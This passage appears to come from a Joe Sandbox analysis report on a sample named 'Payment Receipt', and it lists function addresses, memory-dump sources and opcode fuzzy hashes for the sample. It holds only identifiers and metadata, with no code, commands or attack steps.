                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6ef01b1ac72661cd6691ec6f0fa560b712fabc89b18c38ea978e430efffe28c
                                                                      • Instruction ID: a4622af3935c08754f92a55222bdcf99594fae71a0c74669cb964a9dca8d953e
                                                                      • Opcode Fuzzy Hash: f6ef01b1ac72661cd6691ec6f0fa560b712fabc89b18c38ea978e430efffe28c
                                                                      • Instruction Fuzzy Hash: E711E532600146AFC701CF18C800BA1B7B9FB96314F088169E844CB355D731ED41CBA0
                                                                      Function 0162C810 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b2bfa8c8967cbe4e920ce8c53aaa9aaca4294d46755df5aa72d95dde565521b
                                                                      • Instruction ID: 377565892ee93cbd0f04acf6355d19350e9f47336afdd5fa6978f3f491f4b9a2
                                                                      • Opcode Fuzzy Hash: 5b2bfa8c8967cbe4e920ce8c53aaa9aaca4294d46755df5aa72d95dde565521b
                                                                      • Instruction Fuzzy Hash: F5111FB1E002199FCB04DF99D545A9EBBF4FF58250F10405AE905EB351D674EA018B94
                                                                      Function 0164EA60 Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81bd05bc98b193e296741e99f19e12f5d3ab130021021f691f7e8d4711415cc0
                                                                      • Instruction ID: 88ab704b4df7c0c4902da7c0b189e6aafa7bb5442f1ceed8494f6c63aa17e115
                                                                      • Opcode Fuzzy Hash: 81bd05bc98b193e296741e99f19e12f5d3ab130021021f691f7e8d4711415cc0
                                                                      • Instruction Fuzzy Hash: F301D8311402129BCB32AF25CC84D7BBBB9FF92660B04442EE9455F751C736EC81CBA1
                                                                      Function 0159C020 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                      • Instruction ID: b9e1b4fc6a77a3e2434c91a0b1730e6fefca9ddefc2a371d2d881cb1ede12561
                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                      • Instruction Fuzzy Hash: CE01B532100746DFEF229AAAC844AAF77F9FFC5654F04481DA6468F540EA74E441C751
                                                                      Function 015E20F0 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ecc6207dfdd3330e751fb6a88081aa0f1936970c70dfbe4c27baa3aa0227a06
                                                                      • Instruction ID: 89b26e286297be4dcc16934366f9f0941bbe13edc2308c33d4aaf48bc8cca1a4
                                                                      • Opcode Fuzzy Hash: 9ecc6207dfdd3330e751fb6a88081aa0f1936970c70dfbe4c27baa3aa0227a06
                                                                      • Instruction Fuzzy Hash: 2C116D35E0124DAFCB09EFA4CC55EAE7BF9FB84740F004059E9059B254D635EE11CB90
                                                                      Function 015DE5CF Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f518ea6f16ea7661f856339c93340709cedf22c8c926df4741e12f3a731bf68
                                                                      • Instruction ID: be75118d75fde44ea11b44588fa730a00f544e37e9a26c394179166bf2908527
                                                                      • Opcode Fuzzy Hash: 8f518ea6f16ea7661f856339c93340709cedf22c8c926df4741e12f3a731bf68
                                                                      • Instruction Fuzzy Hash: 38018F71211A02BFD751AF6ACDC4E97BBACFF956A4B040629B1099BA51DB24FC01C6B0
                                                                      Function 016369C0 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 044b3de66a966e7965fb61d6969a06d60797f7610739e8878de7a76da51e6680
                                                                      • Instruction ID: 1ef587c04a649c3ad27194c2ac42c4ffe4581d1f3b8008aa02f0b4f91fdc5567
                                                                      • Opcode Fuzzy Hash: 044b3de66a966e7965fb61d6969a06d60797f7610739e8878de7a76da51e6680
                                                                      • Instruction Fuzzy Hash: 9A01F032214202EBC324DF6ADC88967BBE8FFD4660F114519ED5987280D7309912C7D1
                                                                      Function 0162C460 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bf4ad412cb3a97d061f523879b65808ed866b3dce7cfb1a41a6f293b4e28513
                                                                      • Instruction ID: fbe85eab14a10a4a659da05ee6a22b93e62f02bed81f06423a7b94f5ff478cbf
                                                                      • Opcode Fuzzy Hash: 5bf4ad412cb3a97d061f523879b65808ed866b3dce7cfb1a41a6f293b4e28513
                                                                      • Instruction Fuzzy Hash: C8115B71A01219EBDB15EF68CC44EAE7BB9FB88340F004059F90197340DA34E911CF90
                                                                      Function 0162C97C Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a86e6a3483f43970f3d9747b642af1fe3bb6cb8ff91dc184a8b1d3f3385b2cb6
                                                                      • Instruction ID: 94efa08d870f97ee6b730a89508c262f7d033dba1b18560ba41cc4f636258145
                                                                      • Opcode Fuzzy Hash: a86e6a3483f43970f3d9747b642af1fe3bb6cb8ff91dc184a8b1d3f3385b2cb6
                                                                      • Instruction Fuzzy Hash: 941179B1A083099FC700DF69D84599BBBE8FF98710F00495AF998DB390E630E900CB92
                                                                      Function 0162CA11 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc2d29c4e7b29f5ea7b4b110664ab735342ff8a21ea2db6952fd97926118e9ac
                                                                      • Instruction ID: 78631c1bab356d4811633474194a09d27dd2bece401a22687287932b4c128377
                                                                      • Opcode Fuzzy Hash: bc2d29c4e7b29f5ea7b4b110664ab735342ff8a21ea2db6952fd97926118e9ac
                                                                      • Instruction Fuzzy Hash: 9B1179B1A083099FC700DF69D84594FBBE8FF99750F00895AF958DB3A4E630E900CB92
                                                                      Function 015BE016 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                      • Instruction ID: 21a871ac7679f7432496d433d4966001218ecc8a0e50a9b19202eb3c82cbe235
                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                      • Instruction Fuzzy Hash: 9E017C322009849FE322861DC988FAA7BE9FB84754F0D08A5FA05CF691D638DC40C622
                                                                      Function 0159826B Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71a3c740179eb060690500bf87b391a894e6ab6bb911eb8bfe175bec27f2d7a1
                                                                      • Instruction ID: 938030d35028612e3d8d2d350ac4f7e4ddcbdb762f57b1580f2669855d05c577
                                                                      • Opcode Fuzzy Hash: 71a3c740179eb060690500bf87b391a894e6ab6bb911eb8bfe175bec27f2d7a1
                                                                      • Instruction Fuzzy Hash: 04018F31B04909DFDF14EB69DC549AE77EEFF82620B5944A9DA01EF680EE20DD01C792
                                                                      Function 0164EB50 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 320aae6c2765bdcbbd83ffec705838de16a1768a45d9a57b65630561ecd63c01
                                                                      • Instruction ID: d1b642eb98bca917fd6b02fcbbfbd23b38a8f726a3ac6cc396d046672792496f
                                                                      • Opcode Fuzzy Hash: 320aae6c2765bdcbbd83ffec705838de16a1768a45d9a57b65630561ecd63c01
                                                                      • Instruction Fuzzy Hash: 7E018F71280702AFD7315E29DE41B56BAACBF95B60F11482EE2069F390D7B5E8418B68
                                                                      Function 015A2582 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e91bbbfb8ccd3f521a20e84c6cb064e7b854c5da33630c9bf73e000c6233f85b
                                                                      • Instruction ID: 1f5d26da3f0c0a8080c631fd7e9e829b645cb1142da797a6dc89d63b8cb76b91
                                                                      • Opcode Fuzzy Hash: e91bbbfb8ccd3f521a20e84c6cb064e7b854c5da33630c9bf73e000c6233f85b
                                                                      • Instruction Fuzzy Hash: 7AF0A932641711B7C732DB56CD41F5BBAAAFFC4B90F154429A6059F640D630ED01D6B0
                                                                      Function 015CC073 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction ID: add8df8e0d5d944f6f85c55b9d36e0d1767bb8e9d86abf46d9f5e8a3c23ece53
                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction Fuzzy Hash: 6CF0C8B2600611AFD324CF4DDC40E57FBEAEBD1A80F048128E509DB220E631ED04CB50
                                                                      Function 0167634F Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffc227a24a5abddf0739d9f43e68933dd29d0131cbc47e0025c696603eab8ff0
                                                                      • Instruction ID: 9a84d8e6ee64376b66924d7b9df955c17521f95b22f9724a3fafcb4f878e3a89
                                                                      • Opcode Fuzzy Hash: ffc227a24a5abddf0739d9f43e68933dd29d0131cbc47e0025c696603eab8ff0
                                                                      • Instruction Fuzzy Hash: 96012171E1060AEFDB04DFA9D95599EBBF8FF98714F10405AF904EB350D6749A01CBA0
                                                                      Function 0159C310 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction ID: aabc7c101413cdbb9597dee93b3631389f48214f58db03ae1cfc1a9c5952312c
                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction Fuzzy Hash: 4CF0F633204A639BDF3216998840B6FAAD9BFD5A64F1A0035E20D9F244CA648D0296D3
                                                                      Function 0167625D Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 671f643b6e390533d19dbe4130aee775b9acab699518600e3e41866f2ab59cee
                                                                      • Instruction ID: efe1ada8a17c63e2f5f93132cba7e5b21aa8c0b45e19ffa4fb72a81381e734b5
                                                                      • Opcode Fuzzy Hash: 671f643b6e390533d19dbe4130aee775b9acab699518600e3e41866f2ab59cee
                                                                      • Instruction Fuzzy Hash: 35018471E0020AEFDB04DFA9D8459AEB7F8FF58300F10805AF914EB350D6749A01CBA0
                                                                      Function 016762D6 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f4ab8a97b22fce7c881cc3edb0ab2be0717390eb741a19ced5ebb24cb55e49f
                                                                      • Instruction ID: 17173640a01f5c9ad6df8c9ba74c74b23b83e81b4e4efa34f17e16d5b1efb7d9
                                                                      • Opcode Fuzzy Hash: 1f4ab8a97b22fce7c881cc3edb0ab2be0717390eb741a19ced5ebb24cb55e49f
                                                                      • Instruction Fuzzy Hash: 64012171E0020AEFDB04DFA9D84599EBBF8FF58714F50405AE914EB350D6749A01CBA0
                                                                      Function 015DCA6F Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction ID: 154156ba5cf307fa2f1be1907db8de61a413231b75c1e5e7532f39dd3a6701df
                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction Fuzzy Hash: 6001AD326416859BD332961DCD05B99BB98FF81750F0D44A9FA049F6A1DBB8C800C312
                                                                      Function 016761E5 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7dbbc5b6442233b5cbb9b9c6f5c7b1f36def7b869c24c8e7a934bfa6bc96057c
                                                                      • Instruction ID: 3d15a71f29cb73b3f8da0dfcd0aae23d4638a1cd64214cd2ccdf071139fbb0c9
                                                                      • Opcode Fuzzy Hash: 7dbbc5b6442233b5cbb9b9c6f5c7b1f36def7b869c24c8e7a934bfa6bc96057c
                                                                      • Instruction Fuzzy Hash: 68012C71A0064AABDB04DFA9D845AEEBBF8BF58710F14405AE505AB280D774AA01CB94
                                                                      Function 016263C0 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction ID: b576f01f978516a871451e397e38b2e80216cdd4f5c35443263e8398ca0e11cd
                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction Fuzzy Hash: 8DF0127210001EBFEF019F94DD80DEF7B7EFF55698B104165FA1196160D635DD21ABA0
                                                                      Function 0162A4B0 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3edcc2cd2b41c9880029b2522c248d3b534366e7691f63d0737284f38d4dc0a3
                                                                      • Instruction ID: 84503588d4953e0c243ddc23725b5f4f120831135743efc4788cd53e91bedc5b
                                                                      • Opcode Fuzzy Hash: 3edcc2cd2b41c9880029b2522c248d3b534366e7691f63d0737284f38d4dc0a3
                                                                      • Instruction Fuzzy Hash: 6F018536100619ABCF129E84DC40EDA7F6AFB4C764F068205FE1966A20C736D971EF81
                                                                      Function 0159C0F0 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 514bc29c02697c3600db852cbaa52bbd6d5fa362abed3b0f8e2a111ad440953f
                                                                      • Instruction ID: 8c8ee5a63a68da382efe2ff3c0148d0e9ad216b7180d8a1b40509064b0223ffd
                                                                      • Opcode Fuzzy Hash: 514bc29c02697c3600db852cbaa52bbd6d5fa362abed3b0f8e2a111ad440953f
                                                                      • Instruction Fuzzy Hash: 40F059B27042425FFB109619AC06F3336DAF7C4750F65842AEB098F2C1FA70DC01839A
                                                                      Function 015D656A Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ecd861690e5327d5a23f6110e5083c8e08ef0c61dd91db9f25f13e99edcf59de
                                                                      • Instruction ID: abf48f106cf0a92c0278c7828f4df975491662e813621637fc5843ef0749f5f0
                                                                      • Opcode Fuzzy Hash: ecd861690e5327d5a23f6110e5083c8e08ef0c61dd91db9f25f13e99edcf59de
                                                                      • Instruction Fuzzy Hash: 3001A470600682DFE3329B2CCD48B6937E8BB40B40F880594FA02DF6DADB68D4428715
                                                                      Function 0164437C Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                      • Instruction ID: 21c6aa0db0b03300340dbd6df347ebdd7238ff0ac77c63798e1c0c5aa0e74e62
                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                      • Instruction Fuzzy Hash: 3FF0893634192347EB77AA6F9C11B2AA696AFD0D51B05052CA556CB740DF60DC018790
                                                                      Function 0162E872 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                      • Instruction ID: aff49091c92f8ce0ed7198841e1389421b235f0034736f54325c50ee88f846a3
                                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                      • Instruction Fuzzy Hash: BDF054337519229BD3219A4ECC80F16B768BFD5A60F1A0175E6449F364C7A5EC028BD0
                                                                      Function 0162C89D Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 18b638dd68ac60aa90a7902ac8c18634ad5cfe7454a58eecfc74afd7bdb0de4c
                                                                      • Instruction ID: 434f7fd27023cb628c7adb6bd67995eac7e868c7189b9c011c14b2b7facb4a24
                                                                      • Opcode Fuzzy Hash: 18b638dd68ac60aa90a7902ac8c18634ad5cfe7454a58eecfc74afd7bdb0de4c
                                                                      • Instruction Fuzzy Hash: D7F0C2716057059FC314EF28C845E1FBBE4FF98710F40865AB898DB390E634EA01CB96
                                                                      Function 015D0854 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                      • Instruction ID: 920186777bd19c2cc30c246f2bdfc1f7e9434594949be26453cf45c632af8884
                                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                      • Instruction Fuzzy Hash: 51F0E972610205AFE725DF25CC01F96B7E9FF98340F148478A545DB1A0FAB0ED01C764
                                                                      Function 0162C912 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad77cfe9ba1c2896c5c4be0f88891667fb79326d4436dc562f6f0e7c71d51783
                                                                      • Instruction ID: e75c6df671d0e0ce167787e8aa8e9dad3440d437a79f7e6f9792227867ac4e03
                                                                      • Opcode Fuzzy Hash: ad77cfe9ba1c2896c5c4be0f88891667fb79326d4436dc562f6f0e7c71d51783
                                                                      • Instruction Fuzzy Hash: C7F04F70A0124AEFCB04EF69D955A9EBBF4FF58340F008055A955EB385DA74EA01CB50
                                                                      Function 015A47FB Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b49ba3933f3b060d0eb895c73d1ac0922f7d40f7ecb9b7906da460497ae894dd
                                                                      • Instruction ID: b27fbef60559a15fefcdf9f1a12a82ca4049f177cef62129644b7d9983591450
                                                                      • Opcode Fuzzy Hash: b49ba3933f3b060d0eb895c73d1ac0922f7d40f7ecb9b7906da460497ae894dd
                                                                      • Instruction Fuzzy Hash: BFF090319966E39FE7228B9CE494B6D7BD4BB00620F8C496AD5598F502C7B4E880C651
                                                                      Function 01660115 Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
